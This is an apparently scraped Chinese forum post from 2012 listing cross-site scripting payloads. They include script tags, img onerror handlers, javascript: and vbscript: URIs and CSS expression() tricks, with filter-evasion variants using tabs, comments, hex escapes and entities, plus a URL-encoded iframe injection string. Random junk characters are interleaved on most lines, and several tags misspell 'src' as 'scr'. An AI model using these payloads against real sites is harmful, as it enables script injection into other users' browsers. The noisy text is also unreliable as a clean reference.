<script>alert("跨站")</script> (最常用)) u5 n( h [' j7 W c. c9 D
<img scr=javascript:alert("跨站")></img>
6 \. r8 H! ~) S( V! G% i% ^<img scr="javascript: alert(/跨站/)></img>
8 u3 ~2 w. q6 T/ P<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
+ s" f! M. C0 w/ b0 @) r8 _<img scr="#" onerror=alert(/跨站/)></img>
+ W( \5 I) L" d! _" r<img scr="#" style="xss:expression(alert(/xss/));"></img>
6 P& b3 k' V- l7 q1 e<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)' h; n8 U% w3 @! |- m6 b) z# v
<img src=vbscript:msgbox ("xss")></img>
4 T, R% A" ]2 k- P/ n<style> input {left:expression (alert('xss'))}</style>" G1 j7 C. Z) b" e
<div style={left:expression (alert('xss'))}></div>
! q, _1 V# _6 a K& K: _- @<div style={left:exp/* */ression (alert('xss'))}></div>
, w) C9 x! d5 n<div style={left:\0065\0078ression (alert('xss'))}></div>
# X, v0 m: M% Z$ n$ w+ r8 ` jhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>) P" v8 k5 Y V* C" Y5 O
unicode <div style="{left:expRessioN (alert('xss'))}">
1 ^$ \5 U) x$ q# e2 ]5 g+ O# a* k6 t3 ^
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["5 `) B6 y; N/ t" R
|
发表于 2012-9-15 14:09:13
收藏
支持
反对